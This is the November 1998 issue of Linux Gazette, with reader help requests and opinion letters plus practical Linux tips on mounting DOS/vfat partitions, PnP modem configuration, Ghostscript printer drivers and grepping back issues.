Linux Gazette... making Linux just a little more fun!

Copyright © 1996-98 Specialized Systems Consultants, Inc.


Welcome to Linux Gazette!(tm)


Published by:

Linux Journal


Sponsored by:

InfoMagic

S.u.S.E.

Red Hat

LinuxMall

Linux Resources

Mozilla

cyclades

Our sponsors make financial contributions toward the costs of publishing Linux Gazette. If you would like to become a sponsor of LG, e-mail us at .

Linux Gazette is a non-commercial, freely available publication and will remain that way. Show your support by using the products of our sponsors and publisher.


Table of Contents
November 1998 Issue #34



The Answer Guy


TWDT 1 (text)
TWDT 2 (HTML)
are files containing the entire issue: one in text format, one in HTML. They are provided strictly as a way to save the contents as one file for later printing in the format of your choice; there is no guarantee of working links in the HTML version.


Got any great ideas for improvements? Send your


This page written and maintained by the Editor of Linux Gazette,


"Linux Gazette...making Linux just a little more fun!"


 The Mailbag!

Write the Gazette at

Contents:


Help Wanted -- Article Ideas


 Date: Sun, 04 Oct 1998 16:04:47 -0500
From: "Casey Bralla",
Subject: Single IP Address & Many Servers. Possible?

This is for the "article wanted" section of the Linux Gazette. Thanks!

I have a single IP address for accessing the Internet. I have an Intranet with several old 486-class computers which all access the Internet via IP Masquerading. The single machine which is actually connected to the Internet (and does the masquerading) is not powerful enough to run a news server, mail server, HTTP server, etc. I would like to split these functions up among the cheap low-cost computers I have lying around. How can I force HTTP web pages to be serviced by the HTTP server even though it is not directly connected to the Internet with an IP address?

Example Diagram below:

 
207.123.456.789  (Single IP address to the Internet)
        |
        |
        486 DX/2-66   (IP Masquerading)
                |
                |
                486 DX-33  Mail Server    192.168.1.1
                |
                |
                K-5 133  HTTP Server   192.168.1.2
                |
                |
                486 DX-33 Leafnode News Server 192.168.1.3
                |
                |
                (Other local machines)
I want anyone on the Internet who accesses my web server by accessing 207.123.456.789 to be directed to the computer at 192.168.1.2 on the Intranet. (obviously, the Intranet users have no problem accessing the correct machines since they just reference the local 192.xxx.xxx.xxx IP address. But how can I make the same functionality available to the rest of the known universe?)

Casey Bralla


 Date: Wed, 7 Oct 1998 15:40:06 -0500
From: "John Watts",
Subject: Missing network card

I've installed (from diskette) Debian 2.0 (hamm) on a system at work. The idea was to set it up as a file/print server for my department. Unfortunately, Linux doesn't believe me when I tell it that there is a network card. Its the EtherExpress 16. I've tried reinstalling and autoprobing, no luck. I've tried different Linux distributions, no luck. HELP!!!!!!!!!!!!

John Watts


 Date: Tue, 06 Oct 1998 21:36:12 PDT
From: "Jonathan Bryant",
Subject: Linux Extra?

I've been trying to encourage my Dad to try Linux. He has showed interest, but was curious if there was a Linux counterpart to Extra! on Windoze. He does a lot of work on the mainframe and needs something that can provide a "3270 terminal interface" for a "TSO session". I wondered if there are any old school programmers out there who can recommend a piece of software which would suit his needs.

Thanks
Jonathan Bryant


 Date: Fri, 09 Oct 1998 08:45:50 -0400
From: "Brian M. Trapp",
Subject: NumLock - On at startup?

Hi! I've been reading the Linux Gazette for almost a year now. NICE WORK!!! You're a great resource.

Here's my quick and probably easy question.. On reboot (yes, I do that occasionally, just to use Win95 and Quicken) Linux (Red Hat 5.1) defaults to starting up with Num Lock off. How can I get it to switch it on for me automatically? (This is a matter of pride - I made the mistake of telling my girlfriend how great and powerful the OS is, and then she has to discover the num lock quirk for me...)

Thanks!
Brian Trapp


 Date: Fri, 9 Oct 1998 09:47:05 +0800
From: "ctc",
Subject: Where to find S3 ViRGE GX2 card driver for Linux

I use S3 ViRGE GX2 video card in my computer, but I cannot run startx. Do you know where I can find drivers for this kind of card? Any information is greatly appreciated. Thanks.

Zhang-Hongyi


 Date: Sun, 11 Oct 1998 16:38:00 -0700
From: Ed Ewing,
Subject: article idea

An article regarding cable modems and security, multiple interfaces etc.

Thanks
Ed


 Date: Sun, 11 Oct 1998 10:47:09 +0200
From: "P.Plantinga",
Subject: drivers savage Linux

Are there drivers for my savage for Red Hat 5.1 xwindows? If there are any, please let me know where to get them.

Thanks
P.Plantinga


 Date: Sat, 10 Oct 1998 04:23:56 -0400
From: Eduardo Herrmann Freitas,
Subject: Ensoniq Audio PCI Sound Card

I would like to know if it is possible to install an Ensoniq Audio PCI Sound Card on Linux...

----
Eduardo


 Date: Mon, 12 Oct 1998 14:01:07 -0400
From: "Mann, Jennifer",
Subject: looking for information

Hi. I am looking for information about how Linux handles transactions and database support. Has the Linux Gazette published any articles pertaining to this topic? If so, I would like to know if and where I can find those articles on the web.

Thank you,
Jennifer Mann


 Date: Thu, 15 Oct 1998 09:01:46 -0500
From: "Mark Shipp(Soefker)",
Subject: Confused with ProComm scripting

I got to your web site through a search on Yahoo. I must say that your help is a very valuable resource.

The reason that I'm doing this search is because I'm looking for someone with experience with the Aspect scripting. Could you or someone that you know steer me in the right path?

What I'm trying to do is create a counter that transmits its value in order to open to different nodes on a network. Below it the part of the program that is giving me the problem. It works except for the fact that I have to use the "TERMMSG" command instead of a "TRANSMIT". This won't work because the "open 0,(value)" statement has to be transmitted across the LAN.

Thanks for your help and time,
Mark

 
proc main
integer unit
   while unit !=3D 3      ; This means "while unit does *not* equal 3".
      unit++            ; Increment the value of counter (add 1 to it)
   termmsg "open 0,%d" unit
   transmit "^M"
                        ;This is where I would add in my other 
programming

pause (2)               
endwhile                ; When unit equals 3 proceed, else count unit 
and restart
                        ; This is where I would close the network
endproc


 Date: Wed, 14 Oct 1998 15:29:49 +0000
From: "J luis Soler Cabezas",
Subject: I need info

Hello, I have a TX pro II motherboard with an VGA onboard video chip. The problem is that Linux X86config X-Window subsystem doesn't recognize this video, the fact is that Linux can't access to Emulated video RAM.

I'm waiting for your news, and please, excuse my English.

----
Luis


 Date: Mon, 19 Oct 1998 08:31:49 -0700
From: Ken Deboy,
Subject: Win95 peer-to-peer vs. Linux server running Samba

I'm wondering if anyone can tell me the advantages of a Linux machine running as a print server for a network of Win95 machines vs. just hang- ing the printer off one of the Win95 machines and setting them up in a peer-to-peer arrangement. You don't have to convince me, because I _do_ run Samba as my print server, but what can I tell my friends to convince them, especially if they aren't having too many problems with their Windoze machines? Thanks for any comments, but no flames...

Ken Deboy


 Date: Sun, 18 Oct 1998 18:03:57 -0400
From: "Gregory Engel",
Subject: How to add disk space to RH 5.1?

I am a new Linux user having installed Red Hat 5.1 last month. (So far so good) After installing several goodies and libraries like qt I find myself running out of disk space on my / directory. I have a Syquest EZ-flyer removeable disk drive that I didn't use at all during the install.

My question is can I move some of the directories that defaulted to the root directory like /tmp/ and /var/ to this drive without a full re-installation, and if so, how. Also I really couldn't figure out how to get the thing working during install. It is a SCSI drive that connects to the parallel port. Red Hat lists it as a supported drive but was of little help when I asked them for specific instructions.

If there is some other strategy I might use to gain disk space without a re-installation I would like to hear it. I'm still amazed I got the thing going in the first place. The partitioning makes me nervous.

Thanks,
Greg Engel


 Date: Tue, 20 Oct 1998 19:50:58 -0700
From: Michael McDaniel,
Subject: imapd

I have found a lot of information about using clients with IMAP servers. I have found basically _nothing_ about how to actually make the imapd server on Linux do anything.

I can point NetScape Messenger at the localhost IMAP server and it (NS) dutifully says "no messages on server". Ok, I know that; how do I get messages on it?

My Suggestion:

Provide an article about imapd - how to set up hosts.allow for security, how to configure sendmail.cf to use it (I'm pretty sure this has to be done), how to set up user mailboxes, etc.

I would love to see an article like this. By the way, how can I be automatically notified when a new issue comes out? I thought I was receiving that information but maybe not - I haven't seen any info about the new articles as they come out lately.

Michael McDaniel


 Date: Mon, 26 Oct 1998 02:27:44 -0500
From: "Oblivion",
Subject: Help, with Debian 2.0 install from CD-ROM not part of HDD card

I am having problems with Debian 2.0 to install the the important, extra, and/ or packages, which include the kernel source and patches. I have got a operating system, but it does not recognize the CD-ROM drive, thus I can not add or upgrade any program packages to the system. I have tried to move the CD-ROM drive to run off the HDD control but the system will not even do look at the BIOS to startup. I am including at the base of this message the system specs. of this machine.

 
        CPU:                    Cyrix 5x86 100MHz
        Hard Drives:            BigFoot 1.2 Gb
                                WD 4.0 Gb
        Floppy Drives:          3.5"
        Bus Type:               PCI
        Extra Drives:           TEAC  CD-55 tray ROM 4x
        Mouse and style:        Bus on COM1
        modem:                  on COM2
        Memory:         24 Megs
        Root Directory:         hdc7
        O/S on system:          Windows 95
        Kernal Version:         2.0.34
        Sound Card:             Drives CDROM - Sound Blaster Pro 16 compatible
Gary


 Date: Thu, 29 Oct 1998 17:53:29 +0100
From: Thierry Durandy,
Subject: Tie with the penguin logo

Do you know if I can find a tie with the Linux penguin logo on it? I could be interested in buying one to wear it and to show my opinion with keeping the suit.

Thierry


 Date: Fri, 30 Oct 1998 17:00:16 EST
From: Ross,
Subject: Cirrus Logic is the pits

Help me, I have a huge computer science project to hand in on Monday 11:00 GMT and my university won't let us use the UNIX boxes on the weekends. I have Linux but alas I have a Cirrus Logic 5446 PCI with 2MB and Xwindows can't hack it--it corrupts the screen. My mate bought a new card to fix this problem. There must be a cheaper sollution, patch, new server, whatever.

Also any quick help on how to set up a PPP conncection would be apreaciated,

Cheers to anyone who can help.

A newly converted Linux user,
Ross


General Mail


 Date: Sun, 4 Oct 1998 22:39:09 +0200
From: A.R. (Tom) Peters,
Subject: Linux certification

I read your article in Linux Gazette 33 on a Linux Certification program with interest. However, I would like to point out (and I will not be the only one), that this issue was already raised by Phil Hughes in L.J. Nov.1997 p.10; since then, there has been a still-active discussion in http://www.linuxjournal.com/HyperNews/get/certification.html. Therefore, I am somewhat surprised to see this paper appear in Linux Gazette without reference to these discussions. Moreover, Robert Hart of Red Hat has been actively defining a RH certification program; see http://www.redhat.com/~hartr/ .

In principle, I sustain initiatives like these. I strongly disagree however, with Dan York's stress on the benefits for conference centers and publishers. Although I don't care if they make a lot of money out of it, I am very much afraid of the consequences: if something like this really catches on, only people who can afford the certification program will be taken seriously as Linux consultants or developers. Everyone else will be officially doomed to be an "amateur", disrespective of competence or contributions already made to the Linux movement. So I think we should NOT copy the expensive MSCE model, but keep Linux certification affordable.

--
Tom "thriving on chaos" Peters


 Date: Sun, 4 Oct 1998 16:53:56 -0400
From: Dan York,
Subject: RE: Linux certification

Tom,
Many thanks for the pointers... I was not aware of the discussion on the linuxjournal.com site and had, in fact, been quite unsuccessful in finding such discussions on the web. Thank you.

Thank you for pointing out Robert Hart's site... yes, others have sent along that pointer as well. Maybe I missed it, but when I was going through Red Hat's site, I didn't see a link to his pages on certification. Thank you for sending the pointer... and I hope Red Hat and Caldera can unify their efforts. We'll see.

As far as your comments on the pricing, I understand your concerns. The struggle is to keep it affordable while also making it objective (which I would do through exams). In truth, Microsoft's MCSE program could cost only $600 (the price of the 6 exams), although in practice people spend much more for books and/or training classes.

Thanks for your feedback - and I look forward to whatever discussions evolve.

Regards,
Dan


 Date: Sat, 3 Oct 1998 16:56:14 +0200
From: "David Andreas Alderud",
Subject: Reb0l

Just thought I'd mention something everybody needs to know... Reb0l is no longer beta and is available from www.rebol.com Really nice, I've used Reb0l since late last year (On my Amiga though) and I'm really pleased, sure think it will run over every other script language.

Kind Regards,
Andreas Alderud.


 Date: Fri, 2 Oct 1998 10:29:21 -0500 (CDT)
From:
Subject: re: links between identical sections

Although I can't speak for other areas of the Gazette, the Graphics Muse can be searched using the Graphics Muse Web site. I have all the back issues online there with topical headings for the main articles in each issue. This feature just went live (online) last night, so it's brand new (which is why no one knew about it before :-).

Take a look at http://www.graphics-muse.org/linux.html and click on the "Muse" button. That will do it for you.

----
Michael J. Hammel, The Graphics Muse

We've added those requested links to each of the regular columns now. Ellen Dahl did this good work for us. --Editor


 Date: Fri, 2 Oct 1998 04:02:23 -0400
From: "Tim Gray",
Subject: Linux easy/not easy/not ready/ready YIKES!

Ok, I've noticed one very strong theme in every message I have ever read about Linux and how it won't be accepted as a desktop. Every message states in one way or another, "if they see a command prompt, they will panic". I am appalled at how IT professionals view users as idiots and morons. I refuse to call myself an IT professional because I help my users and clients use their software and don't "just fix it when they mess it up". A user can learn the command prompt quickly, and it's easier to teach than, "click on start,settings,controlpanel,system,bla bla bla bla...." than, "just type setupmodem and press enter" or whatever command or script you may like. I have started to move all my clients to Linux starting with the servers, saving them time and money. And I have a CEO that logs in as root and adds and removes users at one location. Users are much smarter than everyone gives them credit for and a command prompt doesn't affect them as if the devil just spoke from the speakers. If the IT departments around the world put 1/5 the effort into educating the users than complaining about them, then it would be a non-issue. As computer professionals, we are to keep things running and educate our users, not sit on the pillar looking down with the look of "what do you do to it now?"

As one last question, everyone says "I'll use Linux when it has a standard GUI"... What is a standard GUI? Windows doesn't have one, Linux is the closest thing to a standard GUI than anything else available.

----
Tim Gray


 Date: Tue, 06 Oct 1998 06:56:51 -0400
From: Nathaniel Smith,
Subject: Information on Linux

I wrote you on Article Ideas and told you that I thought you should write an article on how to use Linux for us (click and go people, who are computer dummies), and you were kind enough to publish it. Before I wrote you, I had already ordered 4 books (apparently the wrong ones, and had received two, they started out, "I will assume you already have a full working knowledge of Unix commands). I have had several kind souls, who have taken their time and energy, to point me in a direction that I can help myself, and that is all anyone can ask. Some have even tried to go even further and tried to help me with a hard drive problem that I have. I would like to see someone try that with the Windows crowd, you would most likely come up with an empty mail box. I think that says a lot about the type of people that uses Linux and I just want to thank you and everyone who has tried to help me, for I will try to help myself before asking for anymore help. I think that I have enough to keep me busy learning for quite a while.

thank you
Nathaniel


 Date: Thu, 8 Oct 1998 18:44:33 -0400
From: keith,
Subject: suggestion for Linux security feature

I wonder if you can point me in the right direction to make a suggestion for a new "feature" of Linux which could further help to differentiate it in the marketplace, and which might really give it a LOT of exposure (good) in today's security-conscious press...

The security of computer information has been in the press a lot lately, detectability of "deleted" files on people's hard drives, "secret" files, cache files, cookies, etc. which are out of the purview of the typical (and maybe even the advanced!) user. People either think they've deleted things which they haven't really expunged, or their files are infiltrated, perhaps by a child (accidentally, of course!).

It seems to me quite possible to structure an OS like UNIX (and Linux in particular, since it is under development by so many gifted people) in such a way that all such files are created in a directory under the current user's ownership, in a knowable and findable place, so that:

A. only that user could access their own cache, cookies, pointer files, etc. I do not know how deleted files could be safeguarded in this way, unless it is simply to encrypt everything. Hmmm.;

B. these files - the whole lot of them - could be scrubbed, wiped, obliterated (that's why it's important for them to be in a known and findable place) by their owner, without impairing the function of the applications or the system, and without disturbing similar such files for other users.

C. it would be nice too if there were a way to prevent the copying of certain files, and that would include copying by backup programs (for example, I'm a Mac user and we use Retrospect to back up some of our Macs; there's a feature to suppress the backing up of a particular directory by having a special character (a "bullet", or optn-8) at the beginning or end of the directory name.) But if this could be an OS-level feature, it would be stronger.

If I'm user X, and I want to get rid of my computer, or get rid of everything that's mine on the computer, I should just be able to delete all of my data files (and burn them or wipe them or otherwise overwrite that area of the disk), which I can surely do today. But in addition, I should know where to go to do the same thing with whatever system level files might be out there, currently unbeknownst to me, and be able to expunge them also, without affecting anything for anyone else.

Who would work on such a thing as this? Who would I suggest this to? Of course, it's my idea. (c) Keith Gardner 1998. :) But if something like this could be set up, wouldn't it go a long way in the press, in corporate and government buying mind set, etc.?

I'm writing this very quickly, the idea really just came to me while reading the NY Times this morning with an article (in Circuits, 10/8/98) about computer security, and I am on my way out the door. I don't have time to give it much polish. But I hope the ideas are clear enough. Let me know what you think.

Thanks.
Keith Gardner


 Date: Fri, 16 Oct 1998 15:41:25 -0500 (CDT)
From: Bret McGuire,
Subject: Availability of information for newbies

The October issue of Linux Gazette featured a number of mail messages from individuals seeking basic information on how to start up and run a useful Linux system. A common complaint among these individuals was that basic information was not readily available, leading to the rather humorous suggestion that anyone who operates a usable Linux system was somehow "born with this information". :)

This isn't the case. There are a number of locations on the Web which offer a great deal of information about the Linux operating system. The best starting point is probably still the Linux Documentation Project...

http://sunsite.unc.edu/mdw/

(or at least that's where I always go... I understand there are mirrors all over)

This site features HOWTO documents on nearly every topic you can imagine, along with current copies of the various Guides (everything from the Installation and Getting Started Guide thru The Linux Users' Guide thru The Linux Network Administrators' Guide, etc.). I suspect that this site either has the answer to your questions or has a link to someplace else that does. Definitely worth looking at...

----
Bret


 Date: Mon, 19 Oct 1998 13:54:18 +0200
From: Jonas Erikson,
Subject: go go Network do or die!

My concern is that the free software alternative is going to its grave due to out-dated core bindings to the standard old UNIX core.

In comp.os.plan9 there are discussions like:

| Hasn't the coolness of Linux worn off? If you want true excitement with | how cool an OS is and the fun of pioneering again, how about cloning | Plan 9?

Later in the same thread:

| We need a new Linus to start writing a Plan 9 kernel. GNU's Hurd doesn't | go as far, as a cloned Plan 9 would.

And in other comp.os.* ... more...

I urge not to start all over again - but to modify that what is market recognized and stable. I think, unlike many other freeware enthusiasts, that there is a need for software infrastructure. A weak Linux would scatter a lot of good work and inspirations. For a new alternative it would take far too much time to reclaim the market confidence to freeware again.

I know that what I suggest, is far in terms of development in Linux and that Linux holds a legacy of strong infrastructure. But I don't know if Linux, can tackle the infrastructure requirements building up after the first Internet pioneering..

Users in the MS-world see ACL:s and sharing (thus only the image) capabilities as a condition for selecting system. Also the development trend is that of distributing services, not only inside corporations but also trading with services distributed via CORBA or DCOM. Also other not so heavy standards are emerging as P3P, and do require a more distributive approach.

If we look at sharing with supposed "advanced" like CODA and AFS capabilities in file systems, that is just the beginning. And I think only a symptom, of lacking structures inside UNIX. (CODA _is_ advanced in may aspects not issued here)

New Internet standards make UNIX applications handle more, and more security features not compatible with the system. Building walls in systems by not providing infrastructure is not good for freeware, it's not like Internet at all, not infrastructure.

The emerging operating system would be the most flexible in distributed security and compatible to old standards... And the idea to use a freeware alternative is to be ahead and in control.

Are we still?

So for the Linux Ext2fs kernel 2.3 ACL development: Do embed [domain][gid/uid][rights] for ACL-enteries!

Don't forget that:
Linux is like windows to the whole OS-arena but on the "open/free" OS arena. And software is like infrastructure. - nothing but smaller differences are necessary to gain market. As roads they need to be compatible with most cars, but still improve. Now some infrastructures are gradually being implemented that set new standards to cars, it's a bad idea not to take advantage of these standards.

Jonas


 Date: Sun, 25 Oct 1998 06:53:39 -0500
From: "Bill Parker",
Subject: Compliments on a great issue

Great issue. It will take me some time to absorb even some of the information and good ideas presented here.

I particularly benefited from "Thoughts about Linux," by Jurgen Defurne and "DialMon: The Linux/Windows diald Monitor," by Mike Richardson. I have not had time to read the rest yet.

Thanks and best wishes,
Bill Parker


 Date: Mon, 26 Oct 1998 16:16:37 -0800
From: Dave Stevens,
Subject: Rant

October 17, 1998, Smithers, B.C.
There is a lot of criticism of Linux that goes more or less like this - "Well if it was so hot it would cost something. Everything free is no good."

It isn't necessarily so and it just isn't so.

Copyright is a social vehicle for compensating creators of intellectual property. The copyright expires eventually. Then the benefit of the intellectual work can, if it is of lasting value, be used more widely and, in principle, at least, in perpetuity. This process and model are very familiar in other fields of intellectual endeavor but are new to computer programming. If we look at the body of english literature that fills our libraries and bookshelves, there is certainly no direct correspondence between copyright and quality. All of Shakespeare, to take a favorite of mine, is long out of copyright and is some of the best literature ever created. Or Mozart, or Dickens. You make the list.

The whole consumer software trip is too new for the copyright process and terms to have worked themselves out full term. The concept of computer software as intellectual work, potentially of a high calibre, is just too new for social understanding to be widespread. The idea that intellectual work might be contributed and protected in such a way as to enlarge the realm of the possible in the computer part of the public sphere certainly has a way to go in being got used to.

Does this mean that some of the criticism offered in superficial? To put it kindly, yes. The open source software community is collaboratively creating a standard for computer software below which any commercial vendor will fall at its peril. If you can have all this for free will you actually pay to get an inferior product? Maybe by accident. But not twice. The growth of acceptance of Linux is a step in the spread of the idea of a body of public domain imperative literature. Its quality is no more to be judged by its price than a Chopin waltz.

I would be happy to discuss any of these ideas with coherent correspondents, and invite both comment and criticism.

Dave Stevens


Published in Linux Gazette Issue 34, November 1998


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Next

This page written and maintained by the Editor of Linux Gazette,
Copyright © 1998 Specialized Systems Consultants, Inc.

"Linux Gazette...making Linux just a little more fun!"


More 2¢ Tips!


Send Linux Tips and Tricks to


Contents:


No Linux support Lexmark 40 printers

Date: Thu, 15 Oct 1998 12:18:37 -0600 (MDT)
From: "D. Snider",

For your information:
The Lexmark 40 color printers do all setup/alignment from MS whatever OS.

Lexmark first told me they don't support Linux on their new 40 & 45 printers (all alignment functions are from software under MS something). But hey, the guys at Lexmark came through. They sent me a C program for aligning the printer.

It would be a good candidate to go into an archive (sunsite.unc.edu). I don't know the process for putting software into an archive so I am passing it on to you folks. I also am sending it to Grant Taylor [email protected], who is listed as the custodian of the Printing-HOWTO. The model 40 printer is PostScript and works well.

Cheers
Dale

The Mailbag: Re: text browsers

Date: Mon, 05 Oct 1998 19:46:43 +0200
From: Tomas Pospisek - Sysadmin,
User has problems with <B>, that is not visible in lynx.
Well, this is not the problem of the page, but a problem of lynx configuration. At the bottom of the default lynx config file one can configure the colors for the display of the different tags as one wishes. It is very clear from the comments in the config file on how to do it. One can start lynx with an option lynx -f config.file if I remember right.

Tomas


RE: Problem mounting vfat filesystem ...

Date: Mon, 05 Oct 1998 10:13:54 +0100 (IST)
From: Caolan McNamara,
Jan Jansta wrote...
I have permanent problem with mounting any vfat/dos filesystem with write permisions for all users on my Linux machine. I'm using Red Hat 5.1, kernel version 2.0.34 . Does someone know what's not working properly ?
Here's what I've done. The exact line from my /etc/fstab:
 
/dev/hda1                 /mnt/win95                vfat   umask=000,auto 1 1
The trick is in setting the umask. Caolan


Re: Linux Newbie

Date: Sat, 03 Oct 1998 12:59:16 +0200
From: "Anthony E. Greene",

I saw your letter to Linux Gazette and decided to drop you a few pointers.

Linux Documentation Project:
First, the Linux Documentation Project is your friend. Take a look around the site http://sunsite.unc.edu/LDP/. The documents that you'll find most valuable as a new Linux user are the "Installation and Getting Started Guide" and the "The Linux Users' Guide". Both are available for download in multiple formats. Descriptions and pointers are at http://sunsite.unc.edu/LDP/ldp.html. If you really consider yourself (or your curious friends) clueless, then I'd advise you to buy a ream of paper and print the PDF version of the Linux User's Guide for casual reading. Then get one of the easier distributions, back up your Win95 data, and give Linux a whirl.

Linux Distributions:
I'd recommend Caldera http://www.caldera.com/ for casual non-programmers that are comfortable with Win95 and just want to try Linux. Current versions of Caldera come with the KDE desktop . KDE presents a familiar interface to Win95 users. Red Hat http://www.redhat.com/ is very popular and also relatively easy but is oriented more toward knowledgeable computer users. I'm not familiar enough with SUSE http://www.suse.com/ to make a recommendation, although it's supposed to be easy too. Debian http://www.debian.org/ and Slackware http://www.slackware.org/ are considered by most to be for those who already know how to install and use Linux. There are other distributions, but these are the most popular.

Included Documentation:
Once you get Linux installed, fire up Midnight Commander from the command line using 'mc'. This is an easy to use file manager that, despite its DOS look & feel, is also powerful. Use it to take a look around the /usr/doc directory for the wealth of documentation installed in any popular Linux system. You'll be astounded at the amount of information available if you're accustomed to the Win95 way of doing things. The HOWTO documents in particular will be very useful to new users. HOWTOs are cookbook-style documents written by Linux users who have taken the time to share the steps they took to accomplish something in Linux. Perhaps if you use Linux for a while, you'll have occasion to write a HOWTO of your own.

Manual Pages
If you see references to a command in Linux and would like to know more about using it, chances are you'll find a comprehensive description of the command and all its options in the associated Manual Page. Just type: 'man command' at the command line, substituting the name of the command you're interested in and you'll be presented with a summary of the syntax, usage, and available options for the command. Many man pages also include examples and references to related man pages and commands. To see how to use the manual page system itself, just use 'man man'.

Mailing Lists and Newsgroups
Mailing lists and newsgroups provide a good way to find the answer to a question you haven't been able to find the answer to in the extensive documentation included with Linux or available from the LDP. Mailing lists are generally archived and the archives will probably be able to answer your question. If not, post a note asking for a pointer to the documentation and you'll probably get several good answers. If the problem is simple enough, you'll probably get an explanation too. I've found pointers to comprehensive documentation to be more valuable in the long run though. Often, understanding the solution to one problem allows you to solve other problems later. When subscribing to a mailing list or newsgroup, try to find one that's specific to the distribution you use. Most things are the same across distributions, but there are enough small differences that new users would be best served by getting help that's specific to their distribution.

One more thing; be prepared to do lots of reading. ;-)

--
Anthony E. Greene


Locally Searching the Linux Gazette

Date: Sat, 3 Oct 1998 01:33:17 -0400 (EDT)
From: Ray Marshall,

To begin with, I often like to browse and/or reference present and past issues of the Linux Gazette. But, since I'm not always connected to the Internet, and even when I am, I hate waiting for a page to download; I mirror it locally, both at home, and at work.

On occasion I have found myself grepping the TWDT files for specific references to various topics, commands, packages, or whatever. But, just a plain grep of lg/issue??/issue??.html, will only show references in all but the first 8 issues. So, I made some minor changes in lg/issue01to08, and put an alias (command) in ~/.bashrc, to allow easy scanning of ALL issues.

First, the changes:

 
  cd ~/html/lg/issue01to08
  ln linux_gazette.html lg_issue1.html
  ln linux_gazette.aug.html lg_issue2.html
  ln linux_gazette.sep.html lg_issue3.html
  ln linux_gazette.oct.html lg_issue4.html
  ln linux_gazette.nov.html lg_issue5.html
Now the command declaration (for bash):
 
  lgfind () { command grep -i ""$@"" ~/html/lg/issue01to08/lg_issue?.html ~/html/lg/issue??/issue??.html | more ; }
The same declaration in C-shell (csh):
 
  alias lgfind 'grep  -i ""\!*"" ~/html/lg/issue01to08/lg_issue?.html ~/html/lg/issue??/issue??.html | more'
I suppose I could have used "linux_gazette*" in my grep, but that would have put the resulting output out of order. Besides, these links allow the grep to show which issue number a match is found in.

And I suppose I could also have created either soft or hard links to ALL of the TWDT files in another directory. But I would then have to go there and add another link, every time a new issue came out.

Using this is simple, just:

 
  lgfind <string>
and obvious to most experienced UNIX users, I quote the string if it contains spaces. Also, the string can be a regex expression. You may have noticed the "-i" -- I don't like having to remember the case of the characters I'm looking for.

Once I have the output of lgfind, I point my browser to another html page that I have generated, that contains just links to all of the TWDT files. I will attach that page to this message. You can either add it to the base files, publish it, or whatever TYO. ;-) I put it in the directory that contains your `lg' directory.

I hope this helps someone else, too.

Ray Marshall

PS: I agree with your decision to use "TWDT". It can be read in whatever way one wishes, including very inoffensively. Wise choice.


Re: Problem mounting vfat filesystem

Date: Fri, 02 Oct 1998 21:48:55 +0000
From: Nick Matthews,

From: Jan Jansta
I have a permanent problem with mounting any vfat/dos filesystem with write permissions for all users >on my Linux machine. I'm using Red Hat 5.1, kernel version 2.0.34 Does someone know what's not working properly ?

I had somewhat the same problem. What I did was to put this in my

 
/etc/fstab:
/dev/hda1                 /dos                      vfat   user,noauto 0
0
I don't always want my /dos partition mounted, because I don't want its files cluttering up my db for locating files. But making it a user partition means that anyone can mount and use it.

Good luck,
Nick


Mounting DOS Partitions in Linux

Date: Fri, 02 Oct 1998 17:08:23 -0400
From: Ed Young,

Secure Mounting for DOS Partitions:

In order to open up permissions on your DOS partitions in a secure way, do the following:

Note: in the samples below, the dos usrid (63) and grpid(63) were selected so they wouldn't duplicate any other usrid or grpid in /etc/passwd or /etc/group.

Also, this solution works with Red Hat 5.1, you may have to adjust it slightly if you are using a different distribution.

1) Make a dos user who can't log in by adding the following line to /etc/passwd: dos:*:63:63:MSDOS Accessor:/dos:

2) Make a dos group and add users to the dos group. In the following example, root and ejy are in the dos group. To do this, add a line like the following to /etc/group: dos::63:root,ejy

3) Add the following line (changed to suit your system) to

 
   /etc/fstab:
     /dev/hda1  /C      vfat    uid=63,gid=63,umask=007 0 0
   
Of course, you have to locate your DOS partitions in the first place. This is done by issuing the following commands as 'root':
 
     /sbin/fdisk -l
     df
     cat /etc/fstab
The `fdisk -l` command lists all available devices. `df` shows which devices are mounted and how much is on them. And /etc/fstab lists all mountable devices. The devices remaining are extended partitions, a kind of a partition envelope, which you don't want to mount. And the partition's allocated to other operating systems which you may want to mount.

4) Create a mount point for your DOS disk by issuing the following commands as root: mkdir /C chown dos:dos /C

With this setup, the C: drive is mounted at boot time to /C. Only root and ejy can read and write to it. Note that vfat in /etc/fstab works for vfat16 (and vfat32 natively for Linux 2.0.34 and above).

Enjoy...


Re: Canon BJC-250 question

Date: Fri, 2 Oct 1998 21:32:20 +0200 (CEST)
From:
In issue 33 of the Linux Gazette you wrote:
I have a Canon BJC-250 color printer. I have heard many people say that the BJC-600 printer driver will let me print in color. But I have not heard anyone say where I can get such a driver. I have looked everywhere but where it is. Can you help me?
When people are talking about printer drivers for Linux, they are mostly referring to a piece of code that enables the "Ghostscript" program to produce output on your printer.

Ghostscript is an interpreter of the Postscript page-description language. In the Unix world, it is kind of a lingua franca of talking to a printer. A lot of programs can produce Postscript output.

More expensive printers support Postscript in hardware, other printers need Ghostscript with a driver for that particular printer compiled in.

Invoke Ghostscript as "gs -?" to see a list of all the printers for which support is compiled in. If your printer is not in the list, use a driver for a printer from the same family. Otherwise you might have to compile GhostScript with another driver.

The Ghostscript 5.1 that I'm using (Debian distro) is compiled with the bjc600 driver.

Roland


Re: Help : Modem + HP

Date: Fri, 2 Oct 1998 21:20:58 +0200 (CEST)
From: Roland Smith,
In issue 33 of the Linux Gazette you wrote:
I have already spent hours trying to fix my Supra336 PnP internal modem and my HP DeskJet 720C under Linux! The result is always the same, no communication with teh modem and no page printed on the HP printer! Could someone help me, I am close to abandon!
To use a Plug-and-Play device under Linux, you have to configure it. For that, you can use isapnptools package. It will probably be included with your distribution.

Log in as root, and execute the command "pnpdump >isapnp.conf" Now edit this file to choose sensible values for the parameters the modem requires. Read the isapnp.conf man page. You might want to do "cat /proc/interrupts", "cat /proc/dma" and "cat /proc/ioports" to see which interrupts, DMA channels and I/O addresses are already in use. Once you're finished. copy the isapnp.conf file to /etc (as root). You can now configure the card by issuing the command "isapnp /etc/isapnp.conf" as root.

This probably must be done before the serial ports are configured. Look at the init(8) manpage, and see where the serial ports are configured in the system initialization scripts. Make sure that isapnp is called before the serial ports are configured.

If the modem is an internal one, you might have to disable one of the serial ports in your BIOS, so the modem can use in's address and interrupt.

Now, about the printer, AFIAK all HP *20 models are Windows-only printers. They use the host computer's CPU to perform all kinds of calculations that are normally done by the printer hardware. Therefore it needs a driver. Since HP doesn't release programming info on these devices, there will probably never be Linux drivers for these printers.

You should avoid this kind of brain-dead hardware (mostly referred to as "winprinters", or "winmodems").

Hope this helps :-)

Roland


Gnat and Linux: C++ and Java Under Fire LG #33

Date: Fri, 2 Oct 1998 14:47:46 -0400
From: "Terry Westley",

